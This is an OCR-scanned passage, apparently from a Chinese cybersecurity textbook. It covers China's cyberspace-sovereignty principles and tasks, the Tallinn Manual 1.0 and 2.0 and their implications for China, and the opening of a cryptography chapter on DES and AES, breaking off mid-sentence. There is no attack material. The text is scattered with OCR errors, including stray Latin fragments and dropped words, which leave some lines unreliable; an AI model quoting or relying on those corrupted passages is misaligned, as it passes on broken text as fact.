络 空间 的 国家 行为 。 反 对 网 络 霸权 主义 是 网 络 空间 主权 的 应 有 之 义 , 中 国 反对 任何 国家 、 任 
何 形 式 的 霸权 主义 。 具 体 来 说 ,中 国 反对 任何 国家 利用 网 络 技术 优势 干涉 他 国 网 络 空间 主 
权 的 行为 ,反对 “信息 封建 主义 ”和 “网 络 文化 殖民 主义 ”, 反 对 双重 标准 ,反对 从 事 、 纵 容 或 支 
持 危 害 他 国 国 家 安全 的 不 法 网 络 行为 。 中 国 尊重 各 国 网 络 空间 主权 与 利益 ,主张 各 国 在 网 
络 空间 享有 平等 生存 与 发 展 的 权利 与 自由 。 针 对 网 络 霸权 行为 ,中 国 坚定 维护 网 络 空间 主 
权 。 以 人 民 为 中 心 ,凝聚 共识 ,以 * 创 新, 协调、 绿色 开放、 共享 ”五 大 发 展 理念 为 指引 ,安全 
与 发 展 齐头并进 ,通过 自主 创新 ,发 展 过 硬 技术 实现 技术 突破 ,建设 基础 设施 和 共享 体系 , 提 
升 中 国 在 网 络 空间 领域 的 话语 权 , 走 中 国 特色 网 络 强国 之 路 。 

(5) 加 强国 际 合作 互利 原则 。 

网 络 信息 全 球 化 的 背景 下 ,世界 面临 的 威胁 与 挑战 是 共同 的 ,国际 网 络 空间 问题 的 解决 
需要 通过 国际 合作 ,建立 双边 .多边 的 合作 机 制 ,构建 透明 .民主 的 互联 网 合作 治理 体系 。 通 
过 建立 网 络 空间 国际 对 话 与 合作 机 制 ,加 强 多 层次 合作 与 对 话 , 倡 导 建 立 网 络 空间 主权 互 认 
机 制 ,构建 针对 信息 基础 设施 安全 保障 的 国际 法 律 框架 ,推动 跨国 网 络 犯罪 打击 协调 机 制 与 
技术 协助 体系 的 建立 ,并 逐步 扩大 合作 主体 的 范围 ,从 而 营造 开放 .和 平 、 健 康 的 国际 网 络 空 
间 新 秩序 。 以 维护 领 网 主权 推进 国际 合作 互利 ,以 国际 合作 互利 促进 领 网 主权 之 维护 ,不 仅 
是 顺应 时 代 发 展 的 必然 选择 ,也 是 维护 和 谐 安 定 的 网 络 空间 与 兼容 并 蓄 的 国际 秩序 的 需要 。 

中 国 构建 网 络 空间 主权 的 战略 任务 主要 包括 以 下 6 方面 。 

(1) 坚定 捍卫 网 络 空间 主权 。 

网 络 空间 主权 既是 国家 主权 在 网 络 空间 的 体现 ,也 是 维护 国家 网 络 空间 安全 的 前 提 , 不 
容许 任何 国家 、 组 织 、 个 人 实施 侵犯 网 络 空间 主权 的 行为 。 一 方面 ,政府 应 当 依据 宪法 、 法 
律 .法 规 及 规章 等 规范 独立 自主 对 网 络 空间 及 网 络 信息 设施 进行 管理 ,保障 信息 设施 及 信息 
资源 的 安全 存在 ,确保 国家 网 络 独立 运行 ,信息 自由 流通 ,保障 国家 网 络 系统 不 受 任何 国家 、 
组 织 . 个 人 控制 ; 男 一 方面 ,针对 外 来 网 络 攻击 与 威胁 进行 彻底 的 防御 ,对 不 法 行为 予以 惩处 
或 反击 ,必要 时 将 采取 军事 、 外 交行 政 、 经 济 、 科 技 等 方式 ,坚决 捍卫 国家 领 网 主权 。 

(2) 保护 公民 的 相关 合法 权益 。 

网 络 强国 战略 的 实现 路 径 要 求 以 人 民 为 中 心 ,《 网 络 安全 法 ) 把 保障 公民 网 络 空间 合法 
权益 不 受 侵犯 作为 立法 基础 ,二 者 均 充 分 体现 了 国家 对 各 类 网 络 主体 合法 权利 的 密切 关注 。 
结合 我 国 网 络 空间 公民 权益 保护 的 现状 ,安全 意识 .技术 保 障 、 法 律 规制 及 利益 平衡 应 成 为 
我 国 网 络 主体 合法 权益 得 到 保障 的 核心 要 素 。 提 升 公 民 网 络 安全 意识 是 保护 公民 合法 权益 
的 基础 ,政府 应 当 加 强 网 络 安全 法 制 宣传 ,增强 公众 网 络 空间 主权 意识 与 个 人 信息 保护 意 
识 , 提 升 公众 网 络 安全 防范 与 应 对 能 力 ;技术 保障 是 权益 免 受 侵害 的 主要 途径 ,提高 网 络 安 
全 技术 性 能 ,提高 网 络 系统 修复 能 力 ,缩小 与 网 络 强国 的 技术 鸿沟 ,加 强 对 网 络 空间 的 监管 
与 治理 ,为 公民 个 人 信息 保护 提供 技术 保障 与 安全 环境 ;法 律 规制 是 权益 保障 的 最 高 依据 ， 
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立法 上 科学 完善 公民 个 人 信息 保护 制度 ,进一步 保障 和 规范 网 络 信息 依法 有 序 自由 流动 ,对 
窃取 、 泄 露 和 非法 使 用 公民 个 人 信息 的 违法 犯罪 行为 依法 加 以 惩处 ,为 公民 网 络 空间 合法 权 
Ce 利益 平衡 是 权益 保障 的 重要 关注 点 ,在 网 络 空间 安全 保障 的 过 程 
中 ,由 于 管理 的 存在 ,势必 会 出 现 公 权力 与 互联 网 企业 及 网 络 用 户 的 经 济 权 利 \ 个 人 权利 之 
we 构建 国家 网 络 空间 主权 战略 时 须 做 好 平衡 。 

(3) 确定 国家 领 网 主权 制度 的 体系 与 架构 。 

国家 领 网 主权 制度 的 体系 的 确立 应 当 从 立法 ,行政 ,司法 的 维度 出 发 ,在 立法 上 ,从 网 络 
安全 法 的 制定 、 网 络 基础 设施 安全 保障 的 制定 与 政府 互联 网 络 空间 战略 的 制定 出 发 进一步 
完善 网 络 空间 立法 与 规则 设置 ;在 行政 上 ,以 政府 对 内 的 网 络 管辖 权 与 对 外 的 网 络 自卫 权 为 
基础 ,构建 政府 网 络 管辖 权 的 实施 内 容 ; 在 司法 上 ,从 网 络 空间 司法 规则 的 制定 到 网 络 空间 
执法 的 新 举措 ,为 国家 领 网 主权 的 实施 提供 司法 保障 。 

(4) 保障 国家 关键 信息 基础 设施 安全 。 

国家 关键 信息 基础 设施 的 保障 是 国家 构建 网 络 空 间 主权 的 重要 战略 任务 之 一 ,由 于 分 
布 范围 广 ,监管 不 力 、 技 术 漏洞 等 原因 ,国家 关键 信息 基础 设施 正面 临 诸多 安全 风险 。 国 家 
关键 信息 基础 设施 的 安全 是 网 络 安全 的 重要 内 容 , 要 采取 一 切 必要 措施 ,通过 制定 法 律 \ 设 
立 机 构 、 建 立 机 制 、 制 定 预 案 保 障 关键 信息 基础 设施 及 重要 数据 的 安全 。 理 念 与 立法 先行 ， 
提高 保护 的 意识 ,将 国家 关键 信息 基础 设施 保护 上 升 至 国家 层面 ,通过 建立 与 完善 相关 的 法 
律 规范 为 国家 关键 信息 基础 设施 保护 提供 制度 依靠 ;管理 机 构 设立 是 关键 ,政府 统筹 协调 ， 
明确 国家 关键 信息 基础 设施 保护 的 主体 .职责 分 配 以 及 责任 承担 ,消除 监管 漏洞 ,对 破坏 国 
家 关键 信息 基础 设施 的 行为 加 以 惩处 :通过 建立 安全 保护 制度 ,监测 预警 制度 ,应急 处 置 制 
度 , 监 督 管理 制度 和 资源 保障 制度 等 方式 切实 保障 关键 信息 基础 设施 安全 ;制定 预案 ,全 方 
位 提升 保障 能 力 , 加 强 对 国家 关键 信息 基础 设施 的 安全 评测 ,做 到 提前 制定 预案 ,最 大 程度 
降低 关键 信息 基础 设施 受 损 可 能 性 。 

(5) 完善 国家 网 络 空间 治理 体系 。 

国家 网 络 空间 治理 体系 建设 涉及 政治 ,经 济 、 文 化 ,教育 、 科 技 等 多 方面 的 问题 ,同时 也 
涉及 政府 、 网 络 服务 提供 商 \ 个 人 等 互联 网 参与 主体 。 构 建 符合 我 国 国情 的 全 方位 的 社会 化 
治理 体系 需要 厘清 网 络 空 间 治 理 过 程 中 政府 、 网 络 服务 提供 者 和 网 民 三 级 主体 的 分 工 与 权 
责 , 结 合 我 国政 治 制度 、 体 制 结构 以 及 法 律 传统 ,形成 “政府 主导 、 网 络 服 务 提供 者 监管 ,网 民 
自治 ”的 网 络 社会 治理 模式 。 协 调运 用 法 律 规范 .技术 规则 、 信 息 伦理 .自治 规范 4 种 管理 手 
段 , 构 建 虚拟 网 络 社会 的 治理 规范 与 体系 。 加 快 网 络 空间 立法 与 修法 ,为 网 络 空间 营造 一 个 
良好 的 法 制 环境 ,为 网 络 用 户 提供 行为 准则 ,以 网 络 强国 战略 为 指引 ,构建 科学 的 网 络 空间 
法 律 规范 体系 。 改 进 网 络 空间 治理 技术 ,培养 未 来 空间 治理 人 才 ,提升 国家 网 络 空间 综合 能 
力 。 从 治理 主体 .结构 责任 等 方面 出 发 ,比较 不 同治 理 模式 的 优 缺 点 ,构建 多 主体 协同 参与 
网 络 社会 治理 的 模式 。 

(6) 促进 网 络 空间 主权 的 国际 互 认 。 

网 络 空间 主权 问题 因 涉及 国家 核心 利益 ,各 国 对 其 内 涵 、 适 用 范围 .实现 路 径 等 存在 分 
as 网 络 空间 主权 的 国际 互 认 取 决 于 各 国 基 本 理念 的 协调 统一 。 我 国政 府 应 当 积 极 推动 国 

合作 与 对 话 ,充分 利用 各 种 国际 组 织 和 外 交 机 制 ,在 平等 协商 的 基础 上 平衡 各 国 的 网 络 空 
nies 使 网 络 空间 主权 得 到 国际 认可 。 各 国 可 就 网 络 管辖 .主权 责任 、 网 络 防御 与 攻击 应 
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对 措施 以 及 相应 的 技术 标准 和 法 律 规范 逐步 达成 双边 和 多 边 共识 。 我 国 应 当 在 坚决 捍卫 网 
络 主权 的 基础 上 ,积极 参与 国际 网 络 空间 治理 国际 交流 活动 ,创造 有 利 国际 环境 ,达成 国际 
合作 战略 ,推动 建立 开放 有 序 的 国际 合作 机 制 。 


1.4 《塔林 手册 》 


国际 法 适用 于 网 络 空间 ,已 经 得 到 多 个 国家 在 网 络 空间 治理 方面 的 公认 。 越 来 越 多 的 
打击 网 络 犯罪 的 多 边 或 双边 协议 ,也 表明 了 国家 对 网 络 空间 主权 的 法 治 追 求 。 但 诞生 于 物 
理 空间 的 国际 法 如 何 适用 于 虚拟 空间 ?《 塔 林 手 册 ) 就 做 出 了 这 方面 的 有 益 探索 ,为 网 络 空 
间 走 向 国际 法 治 打开 了 一 扇 门 。 


1.4.1 《塔林 手册 》 出 台 的 背景 


什么 是 《塔林 手册 入 《塔林 手册 》 是 由 设 在 爱沙尼亚 首都 塔林 的 北约 协作 网 络 合作 防御 
卓越 中 心 (CCDCOE) 发 起 ,由 美国 海军 学 院 国际 法 系 的 施 密 特 主 导 , 辅 以 其 他 19 位 国际 法 
专家 撰写 的 一 部 适合 和 平时 期 网 络 行动 的 国际 法 规则 。 虽 然 它 没有 法 律 地 位 ,也 不 代表 北 
约 本 身 的 意见 ,但 是 它 填 补 了 网 络 空间 现 有 规则 的 空白 ,已 成 为 处 理 国际 网 络 问题 和 参考 的 
重要 准则 ,目前 已 经 出 了 两 版 ,1.0 版 于 2013 年 完成 ,2.0 版 即 2017 年 2 月 由 英国 剑桥 大 学 
出 版 社 正式 出 版 的 (网络 行动 国际 法 塔林 手册 2. 0 JR) (Tallinn Manual 2. 0 on the 
International Law Applicable to Cyber Operations)( 简 称 《塔林 手册 2.0 版 ))。《 塔 林 手 册 
2.0 版 ) 是 《塔林 手册 1.0 版 ) 的 升级 扩展 版 本 ,都 强调 适用 现实 世界 已 经 有 的 国际 法 规则 ， 
这 与 西方 在 网 络 空 间 的 一 个 核心 理念 是 相关 的 , 即 把 现实 世界 的 国际 法 规则 适用 到 网 络 空 
间 。《 塔 林 手 册 2.0 版 ) 将 原先 用 于 处 理 网 络 战争 的 法 律 拓展 到 和 平时 期 网 络 行动 的 国际 法 
规则 。 

在 各 国 普 遍 重 视 网 络 空间 国际 规则 而 又 缺乏 得 到 公认 的 相关 规则 这 一 背景 下 ,塔林 手 
WE 2.0 版 》 作 为 迄今 为 止 这 一 领域 最 详尽 的 大 型 集体 研究 成 果 , 它 所 涵盖 的 网 络 空间 国际 规 
则 有 可 能 成 为 未 来 相关 实践 中 不 可 回避 的 “标杆 ”, 甚 至 作为 “影子 立法 ”填补 现 有 规则 空白 
并 发 挥 事实 上 的 规则 指引 作用 。 虽 然 该 手册 并 非 北约 官方 文件 或 者 政策 ,只 是 一 个 建议 性 
指南 ,但 也 可 以 看 出 美国 及 其 北约 盟国 利用 《塔林 手册 》 抢 占 网 络 战 规则 制定 权 的 明显 意图 。 


1.4.2 《塔林 手册 》 的 核心 内 容 


史 密 特 说 ,他 的 团队 的 这 项 工作 是 为 了 驯服 随 着 网 络 空间 的 出 现 而 出 现 的 “数字 狂 野 的 
西方 世界 *。 下 面 来 看 《塔林 手册 ?是 如 何 驯服 这 个 网 络 世界 的 《塔林 手册 1.0 版》 在 现 有 
国际 法 能 否 适用 于 网 络 战 的 问题 上 做 了 谨慎 而 又 具有 创新 性 的 探索 ,其 基本 立场 是 肯定 现 
行 国际 法 规范 完全 适用 于 网 络 空间 和 网 络 战 。 

《塔林 手册 1.0 版 ) 的 正文 分 为 “国际 网 络 安 全 法 "和 “网 络 武装 冲突 法 ”两 部 分 ,共有 7 
章 95 条 规则 ,每 一 条 规则 后 面 都 附 有 专家 组 的 评论 ,对 每 一 条 规则 的 法 律 基础 和 实践 意义 
以 及 专家 组 在 阐释 问题 上 的 分 歧 做 出 了 详细 评注 “国际 网 络 安全 法 ?这 一 部 分 主要 规定 了 
“ 诉 诸 战 争 权 ”和 “ 战 时 法 ”在 网 络 空 间 中 的 适用 。 第 1 章 是 “国家 和 网 络 空 间 ”, 主 要 规定 了 
主权 原则 管辖 权 原 则 、 国 家 责任 原则 、 国 家 着 和 免 原 则 以 及 认可 受 网 络 攻击 国有 权 采 取 适 当 
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比例 的 反 措 施 等 事项 。 第 2 章 是 关于 “使 用 武力 ”的 规定 。《 塔 林 手 册 1.0 版 ?第 11 条 规则 
明确 了 “使 用 武力 ”的 概念 , 即 “ 网 络 行动 的 规模 和 影响 达到 构成 使 用 武力 的 非 网 络 行动 的 程 
度 , 即 构成 使 用 武力 ”。 这 一 条 规则 采用 “严重 性 “及 时 性 ”直接 性 “侵入 性 “结果 可 测量 
性 “军事 特征 “国家 介入 ”假定 合法 性 ”这 8 个 具体 标准 界定 “使 用 武力 ”的 定义 。 第 二 部 
分 是 关于 “网 络 武装 冲突 法 ”的 内 容 , 这 一 部 分 内 容 包 括 敌 对 行为 .攻击 以 及 受 攻击 的 人 员 和 
物体 .作战 手段 和 方法 .间谍 和 封锁 行为 等 。 这 一 部 分 主要 强调 在 网 络 武装 行动 中 应 遵守 武 
装 冲 突 法 ,并 对 诸如 网 络 攻击 军事 目标 、 民 用 物体 等 网 络 战 中 重要 的 法 律 术语 做 出 了 明确 
界定 ,其 中 第 30 条 规则 指出 “网络 攻击 ?是 指 * 一 种 预期 会 造成 人 员 伤 亡 或 物品 损毁 的 网 络 
行动 ,无 论 该 行动 是 具有 进攻 性 ,还 是 具有 防御 性 ”。 

第 二 部 分 的 核心 是 “ 战 时 法 /交战 正义 ”(jus in bello) , 即 武装 冲突 法 或 国际 人 道 法 在 网 
络 战 中 的 适用 ,包括 了 5 章 78 条 : 武装 冲突 法 一 般 规定 ,敌对 行为 ,特定 人 员 物体 和 行为 ， 
占领 ,中 立 。“ 在 武装 冲突 中 实施 网 络 行动 应 遵守 武装 冲突 法 ?成 为 这 一 部 分 的 基本 出 发 点 。 
这 一 部 分 界定 了 网 络 战 中 许多 至 关 重 要 的 法 律 术语 ,如 网 络 攻击 、 民 用 物体 .军事 目标 、 不 分 
皂 白 的 攻击 .报复 等 ,并 对 相关 武装 冲突 法 的 规定 作 了 网 络 空间 中 的 解读 。 

以 平时 法 和 战争 法 为 分 类 线索 ,依据 国际 法 调整 的 国际 关系 领域 可 以 将 国际 法 分 为 平 
时 国际 法 和 战 时 国际 法 。《 塔 林 手 册 1.0 版 ) 是 战 时 国际 法 的 适用 。 战 时 国际 法 也 称 为 战争 
法 ,或 武装 冲突 法 ,主要 包括 两 大 方面 内 容 。 一 是 “ 诉 诸 武 力 法 ”, 是 指 ( 联 合 国 宪章 ) 中 的 一 
个 原则 和 两 个 例外 ,以 及 民族 解放 运动 的 武装 斗争 。 一 个 原则 是 指 ( 宪 章 ) 第 2(4) 条 规定 的 
禁止 在 国际 关系 中 使 用 武力 或 武力 威胁 原则 。 两 个 例外 是 指 ( 宪 章 ) 明 文 规定 的 合法 使 用 武 
力 , 即 自卫 权 ( 第 51 条 ) 和 联合 国 采取 的 或 授权 采取 的 武力 行动 (第 42 条 和 第 53 条 )。 前 者 
是 各 国 单方 面 诉 诸 武 力 , 后 者 是 联合 国 集体 安全 体制 下 使 用 武力 。 二 是 “ 战 时 法 "(也 称 “ 国 
际 人 道 法 ”) ,包括 战 时 国际 关系 规则 (处 理 交 战国 之 间 、 交 战国 与 中 立国 之 间 的 规则 ) fe AR 
行为 规则 (对 交战 行为 的 限制 ,包括 交战 人 员 的 法 律 地 位 ,对 和 平 居 民 、 战 俘 .战争 受难 者 的 
保护 及 对 作战 手段 和 方法 的 限制 ) 等 。《 塔 林 手 册 2. 0 版 ) 就 是 和 平时 期 国际 法 在 网 络 空间 
的 适用 ,主要 包括 和 平时 期 国际 法 原则 在 网 络 空 间 的 适用 、 和 平时 期 的 空气 空间 法 、 外 太空 
法 ,海洋 法 .电信 法 、 国 家 责任 法 等 国际 法 在 网 络 空 间 的 适用 。 

《塔林 手册 1.0 版 ) 出 版 后 ,受到 各 国政 府 和 学 界 的 关注 ,同时 也 引发 了 一 些 质疑 ,特别 
是 认为 该 手册 过 度 泻 染 “网 络 战 ”威胁 ,进而 谋求 通过 国际 法 上 的 武力 自卫 权 应 对 网 络 攻 击 ; 
成 员 全 部 来 自 美国 英国、 德国 等 西方 国家 的 “国际 专家 组 ”, 也 不 具有 真正 的 国际 代表 性 。 
为 此 ,CCDCOE 在 2014 年 初 举办 的 一 个 “ 低 烈度 网 络 冲 突 ”(Low Intensity Cyber Conflicts) 
小 型 研讨 会 上 宣布 将 针对 不 构成 使 用 武力 的 “ 低 烈度 ”网 络 行动 ,从 诉 诸 武 力 权 和 战 时 法 规 
以 外 的 平时 国际 法 角度 编纂 一 份 新 的 (塔林 手册 》, 即 (塔林 手册 2.0 版 》。 

《塔林 手册 2. 0 版 ) 是 (塔林 手册 1. 0 版 》 的 姊妹 篇 和 升级 版 ,二 者 既 有 很 大 的 延续 性 ,又 
有 若干 重要 区 别 。 延 续 性 主要 体现 在 :《 塔 林 手 册 2.0 版 ) 仍 由 北约 CCDCOE 发 起 ,担任 项 
目 组 组 长 的 仍然 是 美国 海军 学 院 国际 法 系 的 施 密 特 教授 , 仍 由 一 个 “国际 专家 组 以 非 官方 
身份 集体 编纂 。 也 就 是 说 , 它 的 发 起 者 .核心 班底 和 工作 方法 基本 都 不 变 。 作 为 升级 版 ( 塔 
林 手 册 2.0 版 ) 与 (塔林 手册 1.0 版 ) 的 区 别 主要 表现 在 : 首先 ,前 者 主要 关注 适用 于 和 平时 
期 的 “ 低 烈度 ”网 络 行动 的 国际 法 内 容 , 而 不 是 诉 诸 武 力 权 和 战 时 法 规 等 针对 “网 络 战 ”的 国 
际 法 规则 ;其 次 《塔林 手册 2.0 版 ) 的 20 名 国际 专家 组 成 员 中 ,邀请 了 3 名 分 别 来 自 中 国 、 
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白俄罗斯 和 泰国 的 非 西方 专家 , 相 比 全 部 由 西方 国家 专家 组 成 的 (塔林 手册 1. 0 版 ) 国 际 专 
家 组 ,国际 化 程度 有 所 提高 ;再 次 ,鉴于 (塔林 手册 1. 0 版 ) 受 到 的 另 一 个 质疑 , 即 该 手册 某 些 
内 容 并 未 反映 有 关 国 家 的 立场 和 实践 ,人 (塔林 手册 2.0 版 ) 的 工作 程序 也 进行 了 改进 ,举行 了 
两 次 政府 代表 咨询 会 议 , 听 取 各 国政 府 的 评论 和 意见 。 与 4 塔林 手册 1. 0 版 ) 局 限于 “网 络 
战 ? 方 面 的 诉 诸 武 力 权 和 战 时 法 规 不 同 ,人 《塔林 手册 2.0 版 ) 主 要 关注 不 构成 使 用 武力 和 武装 
冲突 的 和 平时 期 网 络 行动 ,其 内 容 共 包括 15 章 , 分 别 是 : 主权 、 管 辖 权 不 干涉 内 政 、 和 平 解 
决 国际 争端 国家 责任 ,审慎 义务 ,海洋 法 、 人 权 法 、 国 际 组 织 的 责任 、 外 交 法 、 空 气 空间 法 、 外 
层 空间 法 、 电 信 法 、 和 平行 动 、 本 身 不 受 国 际 法 禁止 的 网 络 行动 。 上 述 内 容 基本 涵盖 了 网 络 
空间 国际 法 领域 最 受 关注 的 主要 领域 ,初步 构建 了 一 个 和 平时 期 的 网 络 空 间 国际 规则 体系 。 


1.4.3 《塔林 手册 》 对 我 国 网 络 安全 的 影响 


《塔林 手册 }? 是 一 个 非 官方 的 、 国 际 专家 组 成 员 集体 工作 的 成 果 , 对 国家 并 没有 法 律 的 约 
RJ ,但 是 它 的 唯一 性 和 权威 性 能 起 到 事实 上 的 指引 作用 。《 塔 林 手 册 2. 0 版 ) 这 一 网 络 空 
间 国 际 规则 的 最 新 发 展 ,为 我 国 维护 网 络 空 间 主权 安全 提供 了 参考 ,是 对 我 国 积极 参与 国际 
规则 制定 及 国内 相关 法 律 的 完善 的 启示 。 中 国 需 要 进一步 加 强国 际 网 络 安全 合作 。 

1. 明确 网 络 空间 的 法 治国 际 化 对 策 

从 《塔林 手册 2.0 版 》 的 最 终 成 果 看 ,其 内 容 有 相对 客观 .合理 的 一 面 ; 其 次 ,在 主权 、 不 
干涉 内 政 等 问题 上 , 它 的 内 容 也 有 符合 我 国 利益 、 可 以 为 我 所 用 的 因素 ;再 次 ,在 (塔林 手册 
2. 0 版 ) 几 乎 所 有 的 内 容 中 ,在 有 关 规 则 的 相对 宽泛 和 评注 中 ,国际 专家 组 成 员 立 场 的 多 样 
性 也 为 我 国 确定 自身 的 立场 以 及 过 到 问题 时 进行 抗辩 说 理 提供 了 较 大 的 潜在 空间 。 简 言 
之 ,我 国 应 在 密切 关注 和 深入 研究 的 基础 上 ,不 仅 要 对 《塔林 手册 2.0 版 ) 的 一 些 导 向 和 内 容 
加 以 辩证 ,甚至 加 以 批判 的 认识 ,更 需要 着 眼 于 趋 利 避 害 ,积极 应 对 。 对 于 我 国 不 赞成 并 有 
可 能 在 未 来 对 我 国产 生 不 利 影响 的 内 容 , 可 以 援引 中 国 和 其 他 相关 国家 的 实践 ,质疑 有 关 规 
则 的 习惯 国际 法 地 位 或 有 关 评注 的 习惯 国际 法 依据 ,阻止 其 成 为 有 约束 力 的 国际 法 。 

2. 推动 我 国 国内 网 络 空间 安全 法 治 进程 

随 着 计算 机 技术 的 发 展 和 互联 网 的 普及 ,网 络 空间 已 逐步 发 展 为 与 一 国 的 陆海空 天 
四 维 并 列 的 “第 五 疆域 "。 自 十 八大 以 来 ,中 国 互联 网 治理 历程 ,法 治 思维 和 法 治 方 式 贯穿 始 
终 。 将 互联 网 发 展 纳入 全 面 深化 改革 布局 ,明确 要 求 加 快 完善 互联 网 管理 领导 体制 改革 。 
十 九 大 报告 再 次 强调 网 络 强国 的 发 展 战略 。《 塔 林 手 册 》 从 一 定 程度 上 推动 了 我 国 网 络 安全 
法 治 的 进程 《中 华人 民 共 和 国 网 络 安全 法 》 的 出 台 是 中 国 在 网 络 安全 立法 领域 跨 出 的 具有 
历史 性 意义 的 一 大 步 。 

随后 ,中 国 互联 网 法 治 体系 建设 加 速 开 展 。《 网 络 安全 法 兴 电 信 法 兴 电 子 商 务 法 兴 未 成 
年 人 网 络 保护 条 例 ) 等 法 律 法 规 进入 立法 进程 ,刑法 修正 案 ( 九 )《 中 华人 民 共和 国电 信条 
例 兴 计 算 机 软件 保护 条 例 兴 信息 网 络 传 播 权 保 护 条 例 ) 等 法 律 、 法 规 、 规 章 和 司法 解释 加 快 
na. 

推动 网 络 安全 标准 与 国家 相关 法 律 法 规 配套 衔接 的 工作 也 在 加 快 推 进 。2016 年 印发 
的 (关于 加 强国 家 网 络 安全 标准 化 工作 的 若干 意见 》, 提 出 开展 关键 信息 基础 设施 保护 、 网 络 
安全 审查、 大 数据 安全 ,个 人 信息 保护 、 新 一 代 通 信和 网 络 安 全 、 互 联网 电视 终端 产品 安全 、 网 
络 安全 信息 共享 等 领域 的 标准 研究 和 制定 工作 ,为 建立 统一 权威 的 国家 信息 标准 开 了 好 头 。 
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多 措 并 举 , 多 管 齐 下 ,多 方 参 与 ,中 国 互 联网 治理 模式 和 治理 能 力 正 在 变 得 法 治 化 科学 
化 、 现 代 化 。 

3. 提升 自身 网 络 安全 攻防 实力 .提高 网 络 安全 国际 话语 权 

当前 ,一 些 颇 有 实力 的 国家 凭借 自身 技术 、 资 源 优势 ,大 力 推动 冲突 法 在 网 络 空 间 的 适 
用 ,试图 通过 网 络 战 .网 络 自 卫 、 反 制 打击 等 行为 进一步 巩固 在 网 络 空 间 的 主导 权 。 我 国 应 
不 断 增强 自身 的 网 络 安全 防御 能 力 和 威慑 能 力 ,争取 与 欧美 国家 对 等 的 国际 话语 权 。 努 力 
提高 基础 设施 抵抗 攻击 能 力 、 网 络 攻击 溯源 反 制 能 力 ,掌握 在 冲突 法 适用 、 网 络 战 规则 制定 
等 问题 上 的 话语 权 。 

4. 加 大 网 络 安全 队伍 建设 和 人 才 培 养 力 度 

《塔林 手册 2. 0 版 ) 的 一 个 重要 启示 是 ,在 网 络 空 间 国际 规则 制定 中 ,学 者 的 影响 力 往 往 
可 以 成 为 政府 的 有 力 补充 。 但 是 ,总 体 上 还 是 由 西方 国家 主导 ,并 未 因为 “塔林 2.0” 的 有 限 
国际 化 而 根本 改变 ,在 “塔林 2.0” 的 国际 专家 组 中 ,西方 国家 专家 的 人 数 和 影响 力 都 占据 着 
绝对 优势 。 我 国 需要 构建 一 支 通 法 律 、 擅 外 交会 外 语 \ 懂 (网 络 安 全 ) 技 术 、 能 够 代表 中 国 参 
与 相关 国际 规则 制定 的 高 素质 专业 化 队伍 ,加 大 网 络 空间 国际 法 智库 建设 力度 ,培养 一 支 有 
国际 影响 力 的 人 才 队 伍 ; 制 度 化 .常态 化 地 鼓励 .吸收 相关 学 者 参与 决策 咨询 .相关 实际 工作 
和 国际 对 话 ;搭建 信息 安全 学 科 、 网 络 安全 法 学 科 以 及 国家 建设 高 水 平 大 学 公派 研究 生 项 目 
等 平台 ,加 快 培养 网 络 安全 技术 和 网 络 空 间 国际 法 的 复合 型 .国际 化 人 才 。 
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第 2 音 网 络 安 全 研究 的 内 容 


2.1 密码 技术 


2.1.1 基本 概念 


cryptology( 密 码 学 ) 一 词 由 希腊 字 根 kryptos( Paik) 及 logos (信息 ) 组 合 而 成 。 密 码 学 
泛 指 一 切 有 关 研 究 密 码 通 信 的 研究 内 容 。 密 码 具有 信息 加 密 、 可 鉴别 性 、 完 整 性 、 抗 抵赖 性 
等 作用 。 密 码 学 是 研究 编制 密码 和 破译 密码 的 技术 科学 。 研 究 密码 变化 的 客观 规律 ,应 用 
于 编制 密码 以 保守 通信 秘密 的 , 称 为 编码 学 ;应 用 于 破译 密码 以 获取 通信 情报 的 , 称 为 破译 
学 。 两 者 总 称 密码 学 。 

密码 是 通信 双方 按 约 定 的 法 则 进行 信息 特殊 变换 的 一 种 重要 保密 手段 。 依 照 这 些 法 
则 , 变 明文 为 密 文 , 称 为 加 密 变 换 ; 变 密 文 为 明文 , 称 为 解密 变换 。 密 码 在 早期 仅 对 文字 或 数 
码 进行 加 、 脱 密 变 换 , 随 着 通信 技术 的 发 展 , 对 语音 、 图 像 .数据 等 都 可 实施 加 、 脱 密 变 换 。 密 
码 学 是 在 编码 与 破译 的 斗争 实践 中 逐步 发 展 起 来 的 ,并 随 着 先进 科学 技术 的 应 用 ,已 成 为 一 
门 综合 性 的 尖端 技术 科学 。 

密码 体制 也 称 为 密码 系统 ,是 指 能 完整 地 解决 信息 安全 性 中 机 密 性 .数据 完整 性 认证、 
身份 识别 .可 控 性 及 不 可 抵赖 性 等 问题 中 的 一 个 或 者 多 个 的 完整 系统 。 对 一 个 密码 体制 的 
正规 描述 ,需要 用 数学 方法 清楚 地 描述 其 中 的 各 种 对 象 .参数 .解决 问题 所 使 用 的 算法 等 。 


2.1.2 密码 算法 


在 网 络 安全 领域 .常见 的 加 密 算 法 有 DES 算法 .AES 算 法 .ECC 算法 。 

1. DES 算法 

DES 算法 属于 密码 体制 中 的 对 称 密码 体制 ,又 被 称 为 美国 数据 加 密 标准 ,是 1972 年 美 
E IBM 公司 研制 的 对 称 密码 体制 加 密 算法 。 其 密 钥 长 度 为 56 位 ,明文 按 64 位 进行 分 组 ， 
将 分 组 后 的 明文 根据 56 位 的 密 钥 按 位 替代 或 交换 的 方法 形成 密 文 。 

DES 算法 的 特点 : 分 组 较 短 , 密 钥 太 短 ,密码 生命 周期 短 ,运算 速度 较 慢 。DES 的 入 口 
参数 有 3 个 : Key, Data, Mode, Key 为 加 密 解 密使 用 的 密 钥 ,Data 为 加 密 解 密 的 数据 ， 
Mode 为 其 工作 模式 。 当 模式 为 加 密 模 式 时 ,明文 按照 64 位 进行 分 组 ,形成 明文 组 ,Key 用 
于 对 数据 加 密 s 当 模式 为 解密 模式 时 ,Key 用 于 对 数据 解密 。 实 际 运 用 中 , 密 钥 只 用 到 64 位 
中 的 56 位 ,这 样 才 具有 高 的 安全 性 。 

2. AES 算法 

AES(Advanced Encryption Standard) 算 法 是 下 一 代 的 加 密 算 法 标准 ,速度 快 ,安全 级 
别 高 。2000 年 10 月 ,美国 国家 标准 与 技术 研究 院 (National Institute of Standards and 
Technology. NIST) 从 15 种 候选 算法 中 选 出 AES 算法 作为 新 的 密 钥 加 密 标准 。AES 算法 
正 日 益 成 为 电子 数据 加 密 的 实际 标准 。 
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AES 是 一 个 迭代 的 、 对 称 密 钥 分 组 的 密码 , 它 可 以 使 用 128,192 和 256 位 密 钥 ,并 且 用 
128 位 (16B) 分 组 加 密 和 解密 数据 。AES 算法 基于 排列 和 置换 运算 ,该 算法 通过 分 组 密码 
